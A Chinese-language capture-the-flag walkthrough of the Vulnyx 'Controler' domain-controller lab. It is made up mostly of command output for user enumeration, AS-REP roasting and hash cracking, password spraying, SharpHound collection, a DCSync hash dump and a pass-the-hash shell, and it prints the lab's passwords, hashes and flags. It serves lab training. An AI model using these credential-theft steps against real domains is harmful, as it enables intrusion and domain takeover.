Vulnyx-Controler

windows靶机。

靶机IP:192.168.56.117

信息收集

nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
nmap -T4 -A -v 192.168.56.117    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-11 04:32 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:32
Completed NSE at 04:32, 0.00s elapsed
Initiating NSE at 04:32
Completed NSE at 04:32, 0.00s elapsed
Initiating NSE at 04:32
Completed NSE at 04:32, 0.00s elapsed
Initiating ARP Ping Scan at 04:32
Scanning 192.168.56.117 [1 port]
Completed ARP Ping Scan at 04:32, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:32
Completed Parallel DNS resolution of 1 host. at 04:32, 0.04s elapsed
Initiating SYN Stealth Scan at 04:32
Scanning 192.168.56.117 [1000 ports]
Discovered open port 445/tcp on 192.168.56.117
Discovered open port 135/tcp on 192.168.56.117
Discovered open port 53/tcp on 192.168.56.117
Discovered open port 139/tcp on 192.168.56.117
Discovered open port 88/tcp on 192.168.56.117
Discovered open port 464/tcp on 192.168.56.117
Discovered open port 3269/tcp on 192.168.56.117
Discovered open port 3268/tcp on 192.168.56.117
Discovered open port 636/tcp on 192.168.56.117
Discovered open port 389/tcp on 192.168.56.117
Discovered open port 593/tcp on 192.168.56.117
Completed SYN Stealth Scan at 04:32, 1.46s elapsed (1000 total ports)
Initiating Service scan at 04:32
Scanning 11 services on 192.168.56.117
Completed Service scan at 04:32, 6.22s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.117
NSE: Script scanning 192.168.56.117.
Initiating NSE at 04:32
Completed NSE at 04:33, 8.34s elapsed
Initiating NSE at 04:33
Completed NSE at 04:33, 0.09s elapsed
Initiating NSE at 04:33
Completed NSE at 04:33, 0.00s elapsed
Nmap scan report for 192.168.56.117
Host is up (0.00053s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-11 23:32:51Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:AC:90:5A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: CONTROLER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-11T23:32:52
|_  start_date: N/A
| nbstat: NetBIOS name: CONTROLER, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ac:90:5a (Oracle VirtualBox virtual NIC)
| Names:
|   CONTROLER<00>        Flags: <unique><active>
|   CONTROL<00>          Flags: <group><active>
|   CONTROL<1c>          Flags: <group><active>
|   CONTROLER<20>        Flags: <unique><active>
|_  CONTROL<1b>          Flags: <unique><active>
|_clock-skew: 14h59m57s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.56.117

NSE: Script Post-scanning.
Initiating NSE at 04:33
Completed NSE at 04:33, 0.00s elapsed
Initiating NSE at 04:33
Completed NSE at 04:33, 0.00s elapsed
Initiating NSE at 04:33
Completed NSE at 04:33, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.70 seconds
           Raw packets sent: 1148 (51.210KB) | Rcvd: 1017 (41.350KB)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
nmap 192.168.56.117 --script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-11 04:35 EDT
Nmap scan report for 192.168.56.117
Host is up (0.00040s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
MAC Address: 08:00:27:AC:90:5A (Oracle VirtualBox virtual NIC)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 41.07 seconds

smb登录看一看有什么东西。

1
2
nxc smb 192.168.56.117                                        
SMB         192.168.56.117  445    CONTROLER        [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)

拿到了一个域名,放到hosts里。

尝试进行用户收集。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
ldapsearch -x -H ldap://192.168.56.117
# extended LDIF
#
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
                                                                                                                                                           
┌──(root㉿kali)-[/home/kali/Desktop]
└─# rpcclient -U "" -N 192.168.56.117
rpcclient $> netshareenum
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> netshareenumall
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> ^C
                                                                                                                                                           
┌──(root㉿kali)-[/home/kali/Desktop]
└─# enum4linux -A 192.168.56.117
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 11 04:50:21 2025

 =========================================( Target Information )=========================================
                                                                                                                                                           
Target ........... 192.168.56.117                                                                                                                          
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.117 )===========================
                                                                                                                                                           
                                                                                                                                                           
[+] Got domain/workgroup name: CONTROL                                                                                                                     
                                                                                                                                                           
                                                                                                                                                           
 ==================================( Session Check on 192.168.56.117 )==================================
                                                                                                                                                           
                                                                                                                                                           
[+] Server 192.168.56.117 allows sessions using username '', password ''                                                                                   
                                                                                                                                                           
                                                                                                                                                           
 ===============================( Getting domain SID for 192.168.56.117 )===============================
                                                                                                                                                           
Domain Name: CONTROL                                                                                                                                       
Domain Sid: S-1-5-21-2142633474-2248127568-3584646925

[+] Host is part of a domain (not a workgroup)                                                                                                             
                                                                                                                                                           
enum4linux complete on Wed Jun 11 04:50:21 2025

无果,尝试暴力破解。

(这里用kali自带的用户名字典跑不出来,得换网上专门用于用户枚举的)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
./kerbrute_linux_amd64 userenum -d control.nyx --dc 192.168.56.117 /usr/share/seclists/Usernames/A-Z.Surnames.txt                 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/11/25 - Ronnie Flathers @ropnop

2025/06/11 05:05:02 >  Using KDC(s):
2025/06/11 05:05:02 >   192.168.56.117:88

2025/06/11 05:05:02 >  [+] VALID USERNAME:       B.LEWIS@control.nyx
2025/06/11 05:05:08 >  Done! Tested 13000 usernames (1 valid) in 6.136 seconds

得到一个域用户。

AS-Roasting

查看该域用户是否无域认证,尝试抓取hash。

1
2
3
4
5
6
7
8
9
10
impacket-GetNPUsers control.nyx/B.LEWIS -no-pass 
/usr/lib/python3/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for B.LEWIS
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$B.LEWIS@CONTROL.NYX:673f87866e1253733a78d827c8f76ac2$e746876ee8a2b48932bce457c461397d73700cc3eb7625aa9b93a650718753cae7b6a98a73714ca10b3fd380813a817df0bec981b9ae90a137d7810e0ad49a0c3dcc2681222f14338fa58f47e70dbdad8a8ba4e6c65bb3501beeffa74468e24f7c8fa3958af07d0fc03eff16ed59f10025d3705f7ccf55275777862dd59cde593f49475339b9efcf0cfd62806346d3c1e0a7a3b7fc4e4042de01e89fbd28c672e77735baae50064276a4e4979ad6c98dc03c8691d191b34e7c2cf28f26af322cf57aa3ba88fb643f8d937d582dfadac9928a5354cc4db8d1c2c81d28b4e4874628b6e46858feef80849b

1
2
3
4
5
6
7
8
9
10
john --format=krb5asrep --wordlist=rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
101Music         ($krb5asrep$23$B.LEWIS@CONTROL.NYX)     
1g 0:00:00:09 DONE (2025-06-11 05:15) 0.1006g/s 1353Kp/s 1353Kc/s 1353KC/s 101eagles..1019904
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

尝试用winrm拿到shell,无果。

1
2
3
 nxc winrm 192.168.56.117 -u b.lewis -p 101Music
WINRM       192.168.56.117  5985   CONTROLER        [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx) 
WINRM       192.168.56.117  5985   CONTROLER        [-] control.nyx\b.lewis:101Music

smb登上去查看域内用户。

1
2
3
4
5
6
7
8
9
10
11
12
13
crackmapexec smb 192.168.56.117 -u B.LEWIS -p '101Music' --users
SMB         192.168.56.117  445    CONTROLER        [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
SMB         192.168.56.117  445    CONTROLER        [+] control.nyx\B.LEWIS:101Music 
SMB         192.168.56.117  445    CONTROLER        [+] Enumerated domain user(s)
SMB         192.168.56.117  445    CONTROLER        control.nyx\a.hansen                       badpwdcount: 1 desc: (Account Disabled)
SMB         192.168.56.117  445    CONTROLER        control.nyx\d.petrov                       badpwdcount: 1 desc: (Account Disabled)
SMB         192.168.56.117  445    CONTROLER        control.nyx\m.klein                        badpwdcount: 1 desc: (Account Disabled)
SMB         192.168.56.117  445    CONTROLER        control.nyx\b.lewis                        badpwdcount: 0 desc: (Account Enabled)
SMB         192.168.56.117  445    CONTROLER        control.nyx\j.levy                         badpwdcount: 0 desc: (Account Enabled)
SMB         192.168.56.117  445    CONTROLER        control.nyx\krbtgt                         badpwdcount: 0 desc: Key Distribution Center Service Account
SMB         192.168.56.117  445    CONTROLER        control.nyx\Guest                          badpwdcount: 0 desc: (Account Disabled)
SMB         192.168.56.117  445    CONTROLER        control.nyx\Administrator                  badpwdcount: 0 desc: (Account Enabled)

发现J.Levy用户同样可用。

爆破密码。

1
2
3
4
5
6
crackmapexec smb 192.168.56.117 -u j.levy -p rockyou.txt         
SMB         192.168.56.117  445    CONTROLER        [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
SMB         192.168.56.117  445    CONTROLER        [-] control.nyx\j.levy:123456 STATUS_LOGON_FAILURE 
SMB         192.168.56.117  445    CONTROLER        [-] control.nyx\j.levy:12345 STATUS_LOGON_FAILURE 
.......
SMB         192.168.56.117  445    CONTROLER        [+] control.nyx\j.levy:Password1

得到密码Password1

用winrm可以拿到shell。

1
2
3
nxc winrm 192.168.56.117 -u j.levy -p Password1
WINRM       192.168.56.117  5985   CONTROLER        [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx) 
WINRM       192.168.56.117  5985   CONTROLER        [+] control.nyx\j.levy:Password1 (Pwn3d!)
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/home/kali/Desktop]
└─# evil-winrm -i 192.168.56.117 -u 'j.levy' -p "Password1"               
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.levy\Documents>

拿到userflag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
*Evil-WinRM* PS C:\Users\j.levy\Documents> dir
*Evil-WinRM* PS C:\Users\j.levy\Documents> cd ..
*Evil-WinRM* PS C:\Users\j.levy> cd Desktop
*Evil-WinRM* PS C:\Users\j.levy\Desktop> dir


    Directory: C:\Users\j.levy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/22/2024   2:40 PM             70 user.txt


*Evil-WinRM* PS C:\Users\j.levy\Desktop> cat user.txt
587c4dac7a29c5c2a2d98732116e5bee
*Evil-WinRM* PS C:\Users\j.levy\Desktop>

GetAdmin

用bloodhound分析域,上传sharphound。

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\j.levy\Documents> upload /home/kali/Desktop/SharpHound.exe
                                        
Info: Uploading /home/kali/Desktop/SharpHound.exe to C:\Users\j.levy\Documents\SharpHound.exe
                                        
Data: 1715540 bytes of 1715540 bytes copied
                                        
Info: Upload successful!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
*Evil-WinRM* PS C:\Users\j.levy\Documents> .\SharpHound.exe -c All -d control.nyx
2025-06-11T17:40:46.0437737-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-06-11T17:40:46.1687827-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-06-11T17:40:46.1687827-07:00|INFORMATION|Initializing SharpHound at 5:40 PM on 6/11/2025
2025-06-11T17:40:46.3583738-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-06-11T17:40:46.3867934-07:00|INFORMATION|Beginning LDAP search for control.nyx
2025-06-11T17:40:46.4974100-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONTROL.NYX
2025-06-11T17:40:46.5902495-07:00|INFORMATION|Beginning LDAP search for control.nyx Configuration NC
2025-06-11T17:40:46.5902495-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-06-11T17:40:46.5902495-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-06-11T17:40:46.7156535-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONTROL.NYX
2025-06-11T17:40:46.9349151-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONTROL.NYX
2025-06-11T17:40:52.4847691-07:00|INFORMATION|Consumers finished, closing output channel
2025-06-11T17:40:52.5245244-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-06-11T17:40:52.5968654-07:00|INFORMATION|Status: 298 objects finished (+298 49.66667)/s -- Using 39 MB RAM
2025-06-11T17:40:52.5968654-07:00|INFORMATION|Enumeration finished in 00:00:06.1712809
2025-06-11T17:40:52.6228715-07:00|INFORMATION|Saving cache with stats: 15 ID to type mappings.
 0 name to SID mappings.
 1 machine sid mappings.
 3 sid to domain mappings.
 0 global catalog mappings.
2025-06-11T17:40:52.6228715-07:00|INFORMATION|SharpHound Enumeration Completed at 5:40 PM on 6/11/2025! Happy Graphing!
*Evil-WinRM* PS C:\Users\j.levy\Documents> dir


    Directory: C:\Users\j.levy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/11/2025   5:40 PM          25769 20250611174047_BloodHound.zip
-a----        6/11/2025   5:40 PM           1288 MWMwNWZhMWQtNWU5Yi00ZGZhLTgzZDEtMDE5NjRmMmE2NWEw.bin
-a----        6/11/2025   5:39 PM        1286656 SharpHound.exe


*Evil-WinRM* PS C:\Users\j.levy\Documents> download 20250611174047_BloodHound.zip
                                        
Info: Downloading C:\Users\j.levy\Documents\20250611174047_BloodHound.zip to 20250611174047_BloodHound.zip
                                        
Info: Download successful!

帮我们分析出这个用户可以执行DCsync攻击,还贴心的准备好了命令。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
impacket-secretsdump 'control.nyx'/'j.levy':'Password1'@'192.168.56.117' -just-dc-user administrator
/usr/lib/python3/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9a8c983c709e851258912c3b1d71c9b05faf1724f522b4f32e57f7bef3366773
Administrator:aes128-cts-hmac-sha1-96:0ca176565c5b47fda5e2ab4f53fbb9d3
Administrator:des-cbc-md5:ce9785d980c1a7f8
[*] Cleaning up...

成功抓取到域管理员的哈希,最后evil-winrm登上去就行了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[/home/kali/Desktop]
└─# evil-winrm -i 192.168.56.117 -u 'administrator' -H "48b20d4f3ea31b7234c92b71c90fbff7"
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/22/2024   2:41 PM             70 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b43e4c1b7df273b73966bc038774bafd
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

#渗透 #Vulnyx #域
Vulnyx-Controler
http://example.com/2025/06/11/Vulnyx-Controler/
Author
Skyarrow
Posted on
June 11, 2025
Licensed under